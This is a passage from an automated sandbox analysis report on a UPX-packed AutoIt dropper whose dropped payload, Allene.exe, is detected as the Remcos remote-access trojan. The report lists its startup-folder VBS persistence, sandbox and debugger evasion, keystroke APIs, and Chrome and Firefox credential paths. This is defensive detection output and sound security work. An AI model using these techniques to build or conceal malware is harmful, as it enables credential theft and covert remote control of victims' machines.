                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005DC4C6 push A3005DBAh; retn 005Dh1_2_005DC50D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063848F push FFFFFF8Bh; iretd 1_2_00638491
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FE70F push edi; ret 1_2_005FE711
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FE828 push esi; ret 1_2_005FE82A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F8945 push ecx; ret 1_2_005F8958
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FEA03 push esi; ret 1_2_005FEA05
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FEAEC push edi; ret 1_2_005FEAEE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D2F12 push es; retf 1_2_005D2F13
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW,1_2_00406128
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeFile created: C:\Users\user\AppData\Local\Milburr\Allene.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008848D7
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00905376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00905376
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_005D48D7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00655376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00655376
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008A3187
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040E54F Sleep,ExitProcess,1_2_0040E54F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_004198C2
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeWindow / User API: threadDelayed 9431Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeWindow / User API: foregroundWindowGot 1745Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-106518
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeAPI coverage: 4.8 %
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeAPI coverage: 6.3 %
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6180Thread sleep count: 189 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6180Thread sleep time: -94500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324Thread sleep count: 73 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324Thread sleep time: -219000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324Thread sleep count: 9431 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324Thread sleep time: -28293000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E445A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EC6D1 FindFirstFileW,FindClose,0_2_008EC6D1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC75C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EEF95
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF0F2
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF3F3
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E37EF
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3B12
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0063445A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C6D1 FindFirstFileW,FindClose,1_2_0063C6D1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0063C75C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063EF95
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063F0F2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063F3F3
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_006337EF
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00633B12
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063BCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008849A0
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeAPI call chain: ExitProcess graph end nodegraph_0-103978
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeAPI call chain: ExitProcess graph end nodegraph_0-106759
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeAPI call chain: ExitProcess graph end nodegraph_0-104044
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F3F09 BlockInput,0_2_008F3F09
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00883B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B3A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B5A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_008B5A7C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_009D9A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009D9A50
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_015FA75E mov eax, dword ptr fs:[00000030h]0_2_015FA75E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_015FA770 mov eax, dword ptr fs:[00000030h]0_2_015FA770
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_015FBDC0 mov eax, dword ptr fs:[00000030h]0_2_015FBDC0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_015FBE20 mov eax, dword ptr fs:[00000030h]0_2_015FBE20
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00442554 mov eax, dword ptr fs:[00000030h]1_2_00442554
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_010FA6BE mov eax, dword ptr fs:[00000030h]1_2_010FA6BE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_010FA6D0 mov eax, dword ptr fs:[00000030h]1_2_010FA6D0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_010FBD20 mov eax, dword ptr fs:[00000030h]1_2_010FBD20
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_010FBD80 mov eax, dword ptr fs:[00000030h]1_2_010FBD80
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,0_2_008D80A9
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AA124 SetUnhandledExceptionFilter,0_2_008AA124
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008AA155
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434168
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433B44
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00433CD7 SetUnhandledExceptionFilter,1_2_00433CD7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_005FA155
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FA124 SetUnhandledExceptionFilter,1_2_005FA124
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe1_2_00410F36
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D87B1 LogonUserW,0_2_008D87B1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00883B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B3A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008848D7
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E4C27 mouse_event,0_2_008E4C27
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe" Jump to behavior
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008D7CAF
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008D874B
                Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp, Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmp, Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0.26:8787
                Source: Allene.exe, 00000001.00000002.4156569703.000000000121A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: 7056ZCiFdE.exe, Allene.exeBinary or memory string: Shell_TrayWnd
                Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\
                Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0.26
                Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageres|
                Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0006689P
                Source: Allene.exe, 00000001.00000002.4156569703.000000000121A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerv
                Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05\7GB
                Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: Allene.exe, 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.drBinary or memory string: [Program Manager]
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A862B cpuid 0_2_008A862B
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: EnumSystemLocalesW,1_2_004470AE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoW,1_2_004510BA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004511E3
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoW,1_2_004512EA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004513B7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoW,1_2_00447597
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoA,1_2_0040E679
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450A7F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: EnumSystemLocalesW,1_2_00450CF7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: EnumSystemLocalesW,1_2_00450D42
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: EnumSystemLocalesW,1_2_00450DDD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00450E6A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008B4E87
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008C1E06 GetUserNameW,0_2_008C1E06
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008B3F3A
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008849A0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_2_0040B335
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: \key3.db1_2_0040B335
                Source: Allene.exeBinary or memory string: WIN_81
